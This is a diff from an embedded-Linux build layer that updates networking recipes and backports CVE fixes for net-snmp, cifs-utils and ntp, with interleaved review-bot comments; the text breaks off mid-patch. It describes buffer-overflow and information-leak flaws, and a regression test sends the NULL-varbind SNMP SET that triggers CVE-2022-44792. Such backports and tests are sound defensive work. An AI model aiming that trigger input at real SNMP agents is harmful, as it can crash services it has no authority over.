installapi build targets +- +-installapi: +-ifeq 
($(RC_ProjectName), mDNSResponderServices) +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild installapi $(buildsettings) -target 'Build Services-macOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild installapi $(buildsettings) -target 'Build Services' $(VER) +-endif +-else ifeq ($(RC_ProjectName), mDNSResponderServices_Sim) +- mkdir -p $(DSTROOT)/AppleInternal +-else ifneq ($(findstring SystemLibraries,$(RC_ProjectName)),) +- cd '$(projectdir)'; xcodebuild installapi $(buildsettings) -target SystemLibrariesDynamic $(VER) +-endif +- +-# Misc. targets +- +-installsrc: +- ditto . '$(SRCROOT)' +- rm -rf '$(SRCROOT)/mDNSWindows' '$(SRCROOT)/Clients/FirefoxExtension' +- +-java: +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target libjdns_sd.jnilib $(VER) +- +-clean:: +- echo clean ++all clean: ++ cd mDNSPosix && $(MAKE) $@ +-- +2.38.1 + diff --git a/meta-networking/recipes-protocols/mdns/files/0008-Mark-deleted-interfaces-as-being-changed.patch b/meta-networking/recipes-protocols/mdns/mdns/0008-Mark-deleted-interfaces-as-being-changed.patch index fdc5105cb9..fdc5105cb9 100644 --- a/meta-networking/recipes-protocols/mdns/files/0008-Mark-deleted-interfaces-as-being-changed.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0008-Mark-deleted-interfaces-as-being-changed.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0009-Fix-possible-NULL-dereference.patch b/meta-networking/recipes-protocols/mdns/mdns/0009-Fix-possible-NULL-dereference.patch index 362d69768e..362d69768e 100644 --- a/meta-networking/recipes-protocols/mdns/files/0009-Fix-possible-NULL-dereference.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0009-Fix-possible-NULL-dereference.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0010-Handle-errors-from-socket-calls.patch b/meta-networking/recipes-protocols/mdns/mdns/0010-Handle-errors-from-socket-calls.patch index b9b0157276..b9b0157276 100644 
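Review bot: The stub's `all clean:` rule is not declared phony, so a file or directory named `all` or `clean` in the source root would make the target look up to date and the delegation to mDNSPosix would be skipped. Adding `.PHONY: all clean` covers that. `$(MAKE) -C mDNSPosix $@` is also the more usual spelling of the `cd mDNSPosix && $(MAKE) $@` recipe line.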
--- a/meta-networking/recipes-protocols/mdns/files/0010-Handle-errors-from-socket-calls.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0010-Handle-errors-from-socket-calls.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch b/meta-networking/recipes-protocols/mdns/mdns/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch index d9adde04c2..d9adde04c2 100644 --- a/meta-networking/recipes-protocols/mdns/files/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch diff --git a/meta-networking/recipes-protocols/mdns/files/mdns.service b/meta-networking/recipes-protocols/mdns/mdns/mdns.service index 531d142dcd..531d142dcd 100644 --- a/meta-networking/recipes-protocols/mdns/files/mdns.service +++ b/meta-networking/recipes-protocols/mdns/mdns/mdns.service diff --git a/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb b/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb index 205dc929be..65f4847d8f 100644 --- a/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb +++ b/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb 
@@ -2,28 +2,31 @@ SUMMARY = "Publishes & browses available services on a link according to the Zer DESCRIPTION = "Bonjour, also known as zero-configuration networking, enables automatic discovery of computers, devices, and services on IP networks." HOMEPAGE = "http://developer.apple.com/networking/bonjour/" LICENSE = "Apache-2.0 & BSD-3-Clause" -LIC_FILES_CHKSUM = "file://../LICENSE;md5=31c50371921e0fb731003bbc665f29bf" +LIC_FILES_CHKSUM = "file://LICENSE;md5=31c50371921e0fb731003bbc665f29bf" DEPENDS:append:libc-musl = " musl-nscd" RPROVIDES:${PN} += "libdns_sd.so" -SRC_URI = "https://opensource.apple.com/tarballs/mDNSResponder/mDNSResponder-${PV}.tar.gz \ +# matches annotated tag mDNSResponder-1310.140.1 +SRCREV = "1d1de95b98fba2077d34c9d78b839a96aa0e1c77" +BRANCH = "rel/mDNSResponder-1310" +SRC_URI = "git://github.com/apple-oss-distributions/mDNSResponder;protocol=https;branch=${BRANCH} \ file://mdns.service \ - file://0001-mdns-include-stddef.h-for-NULL.patch;patchdir=.. \ - file://0002-mdns-cross-compilation-fixes-for-bitbake.patch;patchdir=.. \ - file://0001-Create-subroutine-for-cleaning-recent-interfaces.patch;patchdir=.. \ - file://0002-Create-subroutine-for-tearing-down-an-interface.patch;patchdir=.. \ - file://0003-Track-interface-socket-family.patch;patchdir=.. \ - file://0004-Use-list-for-changed-interfaces.patch;patchdir=.. \ - file://0006-Remove-unneeded-function.patch;patchdir=.. \ - file://0008-Mark-deleted-interfaces-as-being-changed.patch;patchdir=.. \ - file://0009-Fix-possible-NULL-dereference.patch;patchdir=.. \ - file://0010-Handle-errors-from-socket-calls.patch;patchdir=.. \ - file://0011-Change-a-dynamic-allocation-to-file-scope-variable.patch;patchdir=.. \ - file://0001-dns-sd-Include-missing-headers.patch;patchdir=.. 
\ + file://0001-mdns-include-stddef.h-for-NULL.patch \ + file://0002-mdns-cross-compilation-fixes-for-bitbake.patch \ + file://0001-Create-subroutine-for-cleaning-recent-interfaces.patch \ + file://0002-Create-subroutine-for-tearing-down-an-interface.patch \ + file://0003-Track-interface-socket-family.patch \ + file://0004-Use-list-for-changed-interfaces.patch \ + file://0006-Remove-unneeded-function.patch \ + file://0008-Mark-deleted-interfaces-as-being-changed.patch \ + file://0009-Fix-possible-NULL-dereference.patch \ + file://0010-Handle-errors-from-socket-calls.patch \ + file://0011-Change-a-dynamic-allocation-to-file-scope-variable.patch \ + file://0001-dns-sd-Include-missing-headers.patch \ + file://0006-make-Add-top-level-Makefile.patch \ " -SRC_URI[sha256sum] = "040f6495c18b9f0557bcf9e00cbcfc82b03405f5ba6963dc147730ca0ca90d6f" CVE_PRODUCT = "apple:mdnsresponder" @@ -42,13 +45,22 @@ CVE_CHECK_IGNORE += "CVE-2007-0613" PARALLEL_MAKE = "" -S = "${WORKDIR}/mDNSResponder-${PV}/mDNSPosix" +# We install a stub Makefile in the top directory so that the various checks +# in base.bbclass pass their tests for a Makefile, this ensures (that amongst +# other things) the sstate checks will clean the build directory when the +# task hashes changes. +# +# We can't use the approach of setting ${S} to mDNSPosix as we need +# DEBUG_PREFIX_MAP to cover files which come from the Clients directory too. +S = "${WORKDIR}/git" EXTRA_OEMAKE += "os=linux DEBUG=0 'CC=${CC}' 'LD=${CCLD} ${LDFLAGS}'" TARGET_CC_ARCH += "${LDFLAGS}" do_install () { + cd mDNSPosix + install -d ${D}${sbindir} install -m 0755 build/prod/mdnsd ${D}${sbindir} diff --git a/meta-networking/recipes-protocols/net-snmp/net-snmp/CVE-2022-44792-CVE-2022-44793.patch b/meta-networking/recipes-protocols/net-snmp/net-snmp/CVE-2022-44792-CVE-2022-44793.patch new file mode 100644 index 0000000000..ce7e3422ed --- /dev/null +++ b/meta-networking/recipes-protocols/net-snmp/net-snmp/CVE-2022-44792-CVE-2022-44793.patch 
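Review bot: In the second hunk, `cd mDNSPosix` at the top of `do_install` is relative, so every later `build/prod/...` path depends on the task starting in `${S}`. The changed directory also stays in effect for the rest of the function, which continues outside the hunk. `cd ${S}/mDNSPosix` makes the starting point explicit. The added comment block would read more easily as "the stub Makefile lets the checks in base.bbclass find a Makefile, which ensures, among other things, that the sstate checks clean the build directory when the task hashes change".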
@@ -0,0 +1,116 @@ +From 4589352dac3ae111c7621298cf231742209efd9b Mon Sep 17 00:00:00 2001 +From: Bill Fenner <fenner@gmail.com> +Date: Fri, 25 Nov 2022 08:41:24 -0800 +Subject: [PATCH ] snmp_agent: disallow SET with NULL varbind + +Upstream-Status: Backport [https://github.com/net-snmp/net-snmp/commit/be804106fd0771a7d05236cff36e199af077af57] +CVE: CVE-2022-44792 & CVE-2022-44793 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + agent/snmp_agent.c | 32 +++++++++++++++++++ + apps/snmpset.c | 1 + + .../default/T0142snmpv2csetnull_simple | 31 ++++++++++++++++++ + 3 files changed, 64 insertions(+) + create mode 100644 testing/fulltests/default/T0142snmpv2csetnull_simple + +diff --git a/agent/snmp_agent.c b/agent/snmp_agent.c +index 3376357..f51c252 100644 +--- a/agent/snmp_agent.c ++++ b/agent/snmp_agent.c +@@ -3719,12 +3719,44 @@ netsnmp_handle_request(netsnmp_agent_session *asp, int status) + return 1; + } + ++static int ++check_set_pdu_for_null_varbind(netsnmp_agent_session *asp) ++{ ++ int i; ++ netsnmp_variable_list *v = NULL; ++ ++ for (i = 1, v = asp->pdu->variables; v != NULL; i++, v = v->next_variable) { ++ if (v->type == ASN_NULL) { ++ /* ++ * Protect SET implementations that do not protect themselves ++ * against wrong type. 
++ */ ++ DEBUGMSGTL(("snmp_agent", "disallowing SET with NULL var for varbind %d\n", i)); ++ asp->index = i; ++ return SNMP_ERR_WRONGTYPE; ++ } ++ } ++ return SNMP_ERR_NOERROR; ++} ++ + int + handle_pdu(netsnmp_agent_session *asp) + { + int status, inclusives = 0; + netsnmp_variable_list *v = NULL; + ++#ifndef NETSNMP_NO_WRITE_SUPPORT ++ /* ++ * Check for ASN_NULL in SET request ++ */ ++ if (asp->pdu->command == SNMP_MSG_SET) { ++ status = check_set_pdu_for_null_varbind(asp); ++ if (status != SNMP_ERR_NOERROR) { ++ return status; ++ } ++ } ++#endif /* NETSNMP_NO_WRITE_SUPPORT */ ++ + /* + * for illegal requests, mark all nodes as ASN_NULL + */ +diff --git a/apps/snmpset.c b/apps/snmpset.c +index 50f33db..387a51d 100644 +--- a/apps/snmpset.c ++++ b/apps/snmpset.c +@@ -182,6 +182,7 @@ main(int argc, char *argv[]) + case 'x': + case 'd': + case 'b': ++ case 'n': /* undocumented */ + #ifdef NETSNMP_WITH_OPAQUE_SPECIAL_TYPES + case 'I': + case 'U': +diff --git a/testing/fulltests/default/T0142snmpv2csetnull_simple b/testing/fulltests/default/T0142snmpv2csetnull_simple +new file mode 100644 +index 0000000..0f1b8f3 +--- /dev/null ++++ b/testing/fulltests/default/T0142snmpv2csetnull_simple +@@ -0,0 +1,31 @@ ++#!/bin/sh ++ ++. ../support/simple_eval_tools.sh ++ ++HEADER SNMPv2c set of system.sysContact.0 with NULL varbind ++ ++SKIPIF NETSNMP_DISABLE_SET_SUPPORT ++SKIPIF NETSNMP_NO_WRITE_SUPPORT ++SKIPIF NETSNMP_DISABLE_SNMPV2C ++SKIPIFNOT USING_MIBII_SYSTEM_MIB_MODULE ++ ++# ++# Begin test ++# ++ ++# standard V2C configuration: testcomunnity ++snmp_write_access='all' ++. 
./Sv2cconfig ++STARTAGENT ++ ++CAPTURE "snmpget -On $SNMP_FLAGS -c testcommunity -v 2c $SNMP_TRANSPORT_SPEC:$SNMP_TEST_DEST$SNMP_SNMPD_PORT .1.3.6.1.2.1.1.4.0" ++ ++CHECK ".1.3.6.1.2.1.1.4.0 = STRING:" ++ ++CAPTURE "snmpset -On $SNMP_FLAGS -c testcommunity -v 2c $SNMP_TRANSPORT_SPEC:$SNMP_TEST_DEST$SNMP_SNMPD_PORT .1.3.6.1.2.1.1.4.0 n x" ++ ++CHECK "Reason: wrongType" ++ ++STOPAGENT ++ ++FINISHED +-- +2.25.1 + diff --git a/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb b/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb index 7af5147566..eb8e1599fb 100644 --- a/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb +++ b/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb @@ -26,6 +26,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/net-snmp/net-snmp-${PV}.tar.gz \ file://net-snmp-fix-for-disable-des.patch \ file://reproducibility-have-printcap.patch \ file://0001-ac_add_search_path.m4-keep-consistent-between-32bit.patch \ + file://CVE-2022-44792-CVE-2022-44793.patch \ " SRC_URI[sha256sum] = "2097f29b7e1bf3f1300b4bae52fa2308d0bb8d5d3998dbe02f9462a413a2ef0a" diff --git a/meta-networking/recipes-support/chrony/chrony_4.2.bb b/meta-networking/recipes-support/chrony/chrony_4.2.bb index 8ce9e1db55..b7d21b7e91 100644 --- a/meta-networking/recipes-support/chrony/chrony_4.2.bb +++ b/meta-networking/recipes-support/chrony/chrony_4.2.bb @@ -45,7 +45,7 @@ DEPENDS = "pps-tools" # Note: Despite being built via './configure; make; make install', # chrony does not use GNU Autotools. -inherit update-rc.d systemd +inherit update-rc.d systemd pkgconfig # Add chronyd user if privdrop packageconfig is selected inherit ${@bb.utils.contains('PACKAGECONFIG', 'privdrop', 'useradd', '', d)} 
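Review bot: The `CVE:` trailer of the new patch joins two identifiers with `&` (`CVE: CVE-2022-44792 & CVE-2022-44793`), whereas the OpenEmbedded convention for a patch that fixes several CVEs is a space-separated list. Tooling that reads the tag may stop at the first identifier, leaving CVE-2022-44793 to be picked up only from the file name, if at all. I would write the trailer as `CVE: CVE-2022-44792 CVE-2022-44793`. Separately, the comment in the new test script spells the community string `testcomunnity` while the commands use `testcommunity`.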
@@ -53,14 +53,6 @@ USERADD_PACKAGES = "${@bb.utils.contains('PACKAGECONFIG', 'privdrop', '${PN}', ' USERADD_PARAM:${PN} += "${@bb.utils.contains('PACKAGECONFIG', 'privdrop', '--system -d / -M --shell /bin/nologin chronyd;', '', d)}" # Configuration options: -# - For command line editing support in chronyc, you may specify either -# 'editline' or 'readline' but not both. editline is smaller, but -# many systems already have readline for other purposes so you might want -# to choose that instead. However, beware license incompatibility -# since chrony is GPLv2 and readline versions after 6.0 are GPLv3+. -# You can of course choose neither, but if you're that tight on space -# consider dropping chronyc entirely (you can use it remotely with -# appropriate chrony.conf options). # - Security-related: # - 'sechash' is omitted by default because it pulls in nss which is huge. # - 'privdrop' allows chronyd to run as non-root; would need changes to @@ -70,14 +62,17 @@ USERADD_PARAM:${PN} += "${@bb.utils.contains('PACKAGECONFIG', 'privdrop', '--sys PACKAGECONFIG ??= "editline \ ${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)} \ " -PACKAGECONFIG[readline] = "--without-editline,--without-readline,readline" PACKAGECONFIG[editline] = ",--without-editline,libedit" PACKAGECONFIG[sechash] = "--without-tomcrypt,--disable-sechash,nss" -PACKAGECONFIG[privdrop] = "--with-libcap,--disable-privdrop --without-libcap,libcap" +PACKAGECONFIG[privdrop] = ",--disable-privdrop,libcap" PACKAGECONFIG[scfilter] = "--enable-scfilter,--without-seccomp,libseccomp" PACKAGECONFIG[ipv6] = ",--disable-ipv6," -PACKAGECONFIG[nss] = "--with-nss,--without-nss,nss" -PACKAGECONFIG[libcap] = "--with-libcap,--without-libcap,libcap" + +# These are left for backwards compatibility, to avoid breaking existing +# configurations. +PACKAGECONFIG[libcap] = "" +PACKAGECONFIG[nss] = "" +PACKAGECONFIG[readline] = "" # --disable-static isn't supported by chrony's configure script. DISABLE_STATIC = "" 
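Review bot: The three stubs at the end of the last chrony hunk (`PACKAGECONFIG[libcap] = ""`, `PACKAGECONFIG[nss] = ""`, `PACKAGECONFIG[readline] = ""`) make options that used to do something into silent no-ops, and the comment above them does not say what to select instead. On the visible lines `privdrop` now carries the `libcap` dependency and `sechash` carries `nss`, so a configuration that still selects `libcap` or `nss` builds cleanly but adds no flag and no dependency. Since `privdrop` is listed under the security-related options, I would extend the comment to name the replacements, for example `# Deprecated no-ops: use 'privdrop' instead of 'libcap', 'sechash' instead of 'nss', 'editline' instead of 'readline'.` The `readline` mapping is inferred from the removed comment and should be confirmed against chrony's configure script.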
diff --git a/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb b/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb index d4cdda0f81..516e467ee4 100644 --- a/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb +++ b/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb @@ -5,7 +5,10 @@ LICENSE = "GPL-3.0-only & LGPL-3.0-only" LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" SRCREV = "8c06dce7d596e478c20bc54bdcec87ad97f80a1b" -SRC_URI = "git://git.samba.org/cifs-utils.git;branch=master" +SRC_URI = "git://git.samba.org/cifs-utils.git;branch=master \ + file://CVE-2022-27239.patch \ + file://CVE-2022-29869.patch \ +" S = "${WORKDIR}/git" DEPENDS += "libtalloc" diff --git a/meta-networking/recipes-support/cifs/files/CVE-2022-27239.patch b/meta-networking/recipes-support/cifs/files/CVE-2022-27239.patch new file mode 100644 index 0000000000..77f6745abe --- /dev/null +++ b/meta-networking/recipes-support/cifs/files/CVE-2022-27239.patch 
@@ -0,0 +1,40 @@
+From 007c07fd91b6d42f8bd45187cf78ebb06801139d Mon Sep 17 00:00:00 2001
+From: Jeffrey Bencteux <jbe@improsec.com>
+Date: Thu, 17 Mar 2022 12:58:52 -0400
+Subject: [PATCH] CVE-2022-27239: mount.cifs: fix length check for ip option
+ parsing
+
+Previous check was true whatever the length of the input string was,
+leading to a buffer overflow in the subsequent strcpy call.
+
+Bug: https://bugzilla.samba.org/show_bug.cgi?id=15025
+
+Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
+Reviewed-by: David Disseldorp <ddiss@suse.de>
+
+Upstream-Status: Backport [ https://git.samba.org/?p=cifs-utils.git;a=commit;h=007c07fd91b6d42f8bd45187cf78ebb06801139d]
+CVE: CVE-2022-27239
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+---
+ mount.cifs.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/mount.cifs.c b/mount.cifs.c
+index 84274c9..3a6b449 100644
+--- a/mount.cifs.c
++++ b/mount.cifs.c
+@@ -926,9 +926,10 @@ parse_options(const char *data, struct parsed_mount_info *parsed_info)
+ if (!value || !*value) {
+ fprintf(stderr,
+ "target ip address argument missing\n");
+- } else if (strnlen(value, MAX_ADDRESS_LEN) <=
++ } else if (strnlen(value, MAX_ADDRESS_LEN) <
+ MAX_ADDRESS_LEN) {
+- strcpy(parsed_info->addrlist, value);
++ strlcpy(parsed_info->addrlist, value,
++ MAX_ADDRESS_LEN);
+ if (parsed_info->verboseflag)
+ fprintf(stderr,
+ "ip address %s override specified\n",
+--
+2.34.1
diff --git a/meta-networking/recipes-support/cifs/files/CVE-2022-29869.patch b/meta-networking/recipes-support/cifs/files/CVE-2022-29869.patch
new file mode 100644
index 0000000000..f0c3f37dec
--- /dev/null
+++ b/meta-networking/recipes-support/cifs/files/CVE-2022-29869.patch
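Review bot: In CVE-2022-27239.patch the new `strlcpy(parsed_info->addrlist, value, MAX_ADDRESS_LEN);` bounds the copy by a constant rather than by the destination, so it is only safe if `addrlist` is at least `MAX_ADDRESS_LEN` bytes, and that declaration is not visible in the hunk. The `CRED_DOM` copy in the same file uses `sizeof(parsed_info->domain)`; the same form would tie the bound to the buffer here, with the `strnlen(...) < MAX_ADDRESS_LEN` test left as the input-length check. `parse_options` continues outside the hunk, so what happens to an over-long `ip=` value (rejected with an error or silently ignored) cannot be confirmed from these lines and is worth checking when the backport is verified.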
@@ -0,0 +1,48 @@
+From 8acc963a2e7e9d63fe1f2e7f73f5a03f83d9c379 Mon Sep 17 00:00:00 2001
+From: Jeffrey Bencteux <jbe@improsec.com>
+Date: Sat, 19 Mar 2022 13:41:15 -0400
+Subject: [PATCH] mount.cifs: fix verbose messages on option parsing
+
+When verbose logging is enabled, invalid credentials file lines may be
+dumped to stderr. This may lead to information disclosure in particular
+conditions when the credentials file given is sensitive and contains '='
+signs.
+
+Bug: https://bugzilla.samba.org/show_bug.cgi?id=15026
+
+Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
+Reviewed-by: David Disseldorp <ddiss@suse.de>
+
+Upstream-Status: Backport [https://git.samba.org/?p=cifs-utils.git;a=commit;h=8acc963a2e7e9d63fe1f2e7f73f5a03f83d9c379]
+CVE: CVE-2022-29869
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+---
+ mount.cifs.c | 6 +-----
+ 1 file changed, 1 insertion(+), 5 deletions(-)
+
+diff --git a/mount.cifs.c b/mount.cifs.c
+index 3a6b449..2278995 100644
+--- a/mount.cifs.c
++++ b/mount.cifs.c
+@@ -628,17 +628,13 @@ static int open_cred_file(char *file_name,
+ goto return_i;
+ break;
+ case CRED_DOM:
+- if (parsed_info->verboseflag)
+- fprintf(stderr, "domain=%s\n",
+- temp_val);
+ strlcpy(parsed_info->domain, temp_val,
+ sizeof(parsed_info->domain));
+ break;
+ case CRED_UNPARSEABLE:
+ if (parsed_info->verboseflag)
+ fprintf(stderr, "Credential formatted "
+- "incorrectly: %s\n",
+- temp_val ? temp_val : "(null)");
++ "incorrectly\n");
+ break;
+ }
+ }
+--
+2.34.1
+
diff --git a/meta-networking/recipes-support/dnsmasq/dnsmasq/lua.patch b/meta-networking/recipes-support/dnsmasq/dnsmasq/lua.patch
deleted file mode 100644
index be2bb42fc2..0000000000
--- a/meta-networking/recipes-support/dnsmasq/dnsmasq/lua.patch
+++ /dev/null
@@ -1,31 +0,0 @@ -From be1b3d2d0f1608cba5efee73d6aac5ad0709041b Mon Sep 17 00:00:00 2001 -From: Joe MacDonald <joe_macdonald@mentor.com> -Date: Tue, 9 Sep 2014 10:24:58 -0400 -Subject: [PATCH] Upstream-Status: Inappropriate [OE specific] - -Signed-off-by: Christopher Larson <chris_larson@mentor.com> -Signed-off-by: Paul Eggleton <paul.eggleton@linux.intel.com> - ---- - Makefile | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/Makefile b/Makefile -index 73ea23e..ed3eeb9 100644 ---- a/Makefile -+++ b/Makefile -@@ -60,8 +60,8 @@ idn2_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LIBIDN2 $(PKG_CONFI - idn2_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LIBIDN2 $(PKG_CONFIG) --libs libidn2` - ct_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_CONNTRACK $(PKG_CONFIG) --cflags libnetfilter_conntrack` - ct_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_CONNTRACK $(PKG_CONFIG) --libs libnetfilter_conntrack` --lua_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --cflags lua5.2` --lua_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --libs lua5.2` -+lua_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --cflags lua` -+lua_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --libs lua` - nettle_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_DNSSEC $(PKG_CONFIG) --cflags 'nettle hogweed' \ - HAVE_CRYPTOHASH $(PKG_CONFIG) --cflags nettle \ - HAVE_NETTLEHASH $(PKG_CONFIG) --cflags nettle` - --- -2.9.5 - diff --git a/meta-networking/recipes-support/dnsmasq/dnsmasq_2.87.bb b/meta-networking/recipes-support/dnsmasq/dnsmasq_2.87.bb deleted file mode 100644 index 793b61d712..0000000000 --- a/meta-networking/recipes-support/dnsmasq/dnsmasq_2.87.bb +++ /dev/null 
@@ -1,7 +0,0 @@ -require dnsmasq.inc - -SRC_URI[dnsmasq-2.87.sha256sum] = "ae39bffde9c37e4d64849b528afeb060be6bad6d1044a3bd94a49fce41357284" -SRC_URI += "\ - file://lua.patch \ -" - diff --git a/meta-networking/recipes-support/dnsmasq/dnsmasq_2.90.bb b/meta-networking/recipes-support/dnsmasq/dnsmasq_2.90.bb new file mode 100644 index 0000000000..6e4c331102 --- /dev/null +++ b/meta-networking/recipes-support/dnsmasq/dnsmasq_2.90.bb @@ -0,0 +1,3 @@ +require dnsmasq.inc + +SRC_URI[dnsmasq-2.90.sha256sum] = "8f6666b542403b5ee7ccce66ea73a4a51cf19dd49392aaccd37231a2c51b303b" diff --git a/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb b/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb index 004330e1b4..341eab015c 100644 --- a/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb +++ b/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb @@ -33,4 +33,4 @@ do_install() { oe_runmake DESTDIR=${D} netsniff-ng_install } -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-networking/recipes-support/ntp/ntp/CVE-2023-2655x.patch b/meta-networking/recipes-support/ntp/ntp/CVE-2023-2655x.patch new file mode 100755 index 0000000000..fbd0ec151a --- /dev/null +++ b/meta-networking/recipes-support/ntp/ntp/CVE-2023-2655x.patch 
@@ -0,0 +1,323 @@ +CVE: CVE-2023-26551 +CVE: CVE-2023-26552 +CVE: CVE-2023-26553 +CVE: CVE-2023-26554 +CVE: CVE-2023-26555 +Upstream-Status: Backport [https://archive.ntp.org/ntp4/ntp-4.2/ntp-4.2.8p15-3806-3807.patch] + +Signed-off-by: Peter Marko <peter.marko@siemens.com> +--- include/ntp_fp.h 2019-06-03 23:41:14.000000000 -0500 ++++ ../ntp-stable-p16-sec/include/ntp_fp.h 2023-04-17 03:17:01.655121000 -0500 +@@ -195,9 +195,9 @@ + do { \ + int32 add_f = (int32)(f); \ + if (add_f >= 0) \ +- M_ADD((r_i), (r_f), 0, (uint32)( add_f)); \ ++ M_ADD((r_i), (r_f), 0, (u_int32)( add_f)); \ + else \ +- M_SUB((r_i), (r_f), 0, (uint32)(-add_f)); \ ++ M_SUB((r_i), (r_f), 0, (u_int32)(-add_f)); \ + } while(0) + + #define M_ISNEG(v_i) /* v < 0 */ \ +--- libntp/mstolfp.c 2019-06-03 23:41:14.000000000 -0500 ++++ ../ntp-stable-p16-sec/libntp/mstolfp.c 2023-04-17 03:07:38.598581000 -0500 +@@ -14,86 +14,58 @@ + l_fp *lfp + ) + { +- register const char *cp; +- register char *bp; +- register const char *cpdec; +- char buf[100]; ++ int ch, neg = 0; ++ u_int32 q, r; + + /* + * We understand numbers of the form: + * + * [spaces][-|+][digits][.][digits][spaces|\n|\0] + * +- * This is one enormous hack. Since I didn't feel like +- * rewriting the decoding routine for milliseconds, what +- * is essentially done here is to make a copy of the string +- * with the decimal moved over three places so the seconds +- * decoding routine can be used. ++ * This is kinda hack. We use 'atolfp' to do the basic parsing ++ * (after some initial checks) and then divide the result by ++ * 1000. The original implementation avoided that by ++ * hacking up the input string to move the decimal point, but ++ * that needed string manipulations prone to buffer overruns. ++ * To avoid that trouble we do the conversion first and adjust ++ * the result. + */ +- bp = buf; +- cp = str; +- while (isspace((unsigned char)*cp)) +- cp++; + +- if (*cp == '-' || *cp == '+') { +- *bp++ = *cp++; +- } +- +- if (*cp != '.' 
&& !isdigit((unsigned char)*cp)) +- return 0; +- +- +- /* +- * Search forward for the decimal point or the end of the string. +- */ +- cpdec = cp; +- while (isdigit((unsigned char)*cpdec)) +- cpdec++; +- +- /* +- * Found something. If we have more than three digits copy the +- * excess over, else insert a leading 0. +- */ +- if ((cpdec - cp) > 3) { +- do { +- *bp++ = (char)*cp++; +- } while ((cpdec - cp) > 3); +- } else { +- *bp++ = '0'; +- } +- +- /* +- * Stick the decimal in. If we've got less than three digits in +- * front of the millisecond decimal we insert the appropriate number +- * of zeros. +- */ +- *bp++ = '.'; +- if ((cpdec - cp) < 3) { +- size_t i = 3 - (cpdec - cp); +- do { +- *bp++ = '0'; +- } while (--i > 0); +- } +- +- /* +- * Copy the remainder up to the millisecond decimal. If cpdec +- * is pointing at a decimal point, copy in the trailing number too. +- */ +- while (cp < cpdec) +- *bp++ = (char)*cp++; ++ while (isspace(ch = *(const unsigned char*)str)) ++ ++str; + +- if (*cp == '.') { +- cp++; +- while (isdigit((unsigned char)*cp)) +- *bp++ = (char)*cp++; ++ switch (ch) { ++ case '-': neg = TRUE; ++ case '+': ++str; ++ default : break; + } +- *bp = '\0'; +- +- /* +- * Check to make sure the string is properly terminated. If +- * so, give the buffer to the decoding routine. +- */ +- if (*cp != '\0' && !isspace((unsigned char)*cp)) +- return 0; +- return atolfp(buf, lfp); ++ ++ if (!isdigit(ch = *(const unsigned char*)str) && (ch != '.')) ++ return 0; ++ if (!atolfp(str, lfp)) ++ return 0; ++ ++ /* now do a chained/overlapping division by 1000 to get from ++ * seconds to msec. 1000 is small enough to go with temporary ++ * 32bit accus for Q and R. 
